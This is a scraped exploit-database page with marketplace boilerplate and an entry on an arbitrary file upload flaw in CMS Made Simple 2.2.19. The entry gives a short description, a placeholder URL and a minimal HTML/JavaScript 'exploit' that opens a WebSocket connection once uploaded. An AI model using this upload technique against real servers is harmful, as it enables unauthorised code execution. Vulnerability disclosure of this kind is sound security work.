0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CMSMS 2.2.19 Arbitrary File Upload Vulnerability
Description: The parameter "fileupload" in type ID is vulnerable to File Upload and RCE attacks, it is not sanitized correctly. The attacker can upload a virus directly on the server by using this web vulnerability, and then he can execute it, this can be the end of this server depending on the scenario! In this case, I just uploaded a [WebSocket] connector - exploit.html to connect the server with my machine, this is so nasty. I am a Penetration Tester, not a stupid cracker! Thank you all! STATUS: HIGH- Vulnerability [+]Exploit execution: https://pwnedhost.com/uploads/exploit.html [+]Exploit: <html> <script> (() => { const ws = new WebSocket('ws://0.0.0.0:8080') ws.onopen = () => { console.log('ws opened on browser') ws.send('hello, you are connected with malicious software.') } ws.onmessage = (message) => { console.log(`message received ${message}`) } })() </script> </html> # 0day.today [2024-11-16] #